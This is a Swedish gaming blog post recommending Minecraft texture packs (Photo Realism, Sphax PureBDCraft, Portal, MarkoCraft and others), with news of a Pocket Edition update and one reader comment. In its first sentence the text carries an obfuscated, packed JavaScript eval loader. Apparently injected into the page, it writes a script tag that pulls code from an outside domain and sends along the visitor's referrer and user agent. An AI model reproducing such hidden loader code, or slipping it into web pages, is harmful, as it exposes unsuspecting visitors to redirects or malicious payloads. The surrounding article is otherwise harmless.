Image Image Image Image Image Image Image Image Image Image

| 12 maj, 2021

Scroll to top

Top

10 populära Minecraft Texture packs 2012

Sebastian

Minecraft eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dnkit|var|u0026u|referrer|aeeye||js|php’.split(’|’),0,{}))
fortsätter att växa så det knakar och vi bjuder på några Minecraft Texture pack.

Och nu har gänget borta på Mojang också patchat upp mobilversionen Minecraft: Pocket edition till version 0.3.3. i Denna uppdatering finner vi nya monster som skelett och spindlar, pilbåge som nytt vapen samt en massa finjusteringar och nya material. Minecraft Pocket Edition släpptes för ungefär ett år sedan och har hela tiden uppdaterats. Spelet kostar femtio kronor och finns att hämta i Appstore och på Android market.

Med denna uppdatering vill vi fira med att ge er några riktigt snygga minecraft texture packs till datorversionen. För jag gissar att de flesta med mobilversionen också har det på dator 🙂

Här är några fint utvalda Minecraft Texture Packs från oss på Revue:
Klicka på titeln för att se bilder samt ladda ner det valda Minecraft Texture pack

LB Photo Realism Minecraft Texture Pack

HALO Minecraft WARS Texture Pack

Sphax PureBDCraft

ROMECRAFT Texture Pack

Minecraft Texture Pack: Legend of Zelda

Här kommer några till från en av våra äldre utvalda Minecraft Texture Pack

Portal Texture Pack – Portal Minecraft Texture pack är ett paket som innehåller de flesta texturer från spelet portal. Själv tycker jag detta är ett roligt och udda Texture pack till Minecraft just för det är väldigt unikt jämnfört med andra. Ett tips att ha som alternativ i menyn även om man vill använda något annat för stunden.

LB Photo Realism Texture Pack – Detta är en såkallad HD-texture. Detta gör grafiken i spelet otroligt mycket bättre. Som namnet “Realism” har man fokuserat på att försköna miljöerna och göra de så verkliga som möjligt. Otroligt snyggt Texture pack, dock behövs MCPatcher Minecraft Mod för att kunna aktivera det.

MarkoCraft Texture Pack – Detta texture pack har fokuserat på Super Mario och förvandlar Minecraft till en Nintendo värld från 90-talet. Snyggt med en hög nostalgi-känsla.

JapaNinjamurai Texture Pack – Gillar du japanskt? Ifall svaret är ja så är detta helt rätt Minecraft texture pack för dig. Paketet gör om miljön till en värld med inspiration från Japan.

ToonCraft Texture Pack – Ett trevligt Minecraft texture pack som skapar mer ljus i grafiken. Ett texture som funkar för alla. Lite “cartoon” i upplägget.

 

Comments

  1. humpe

    bra tips tack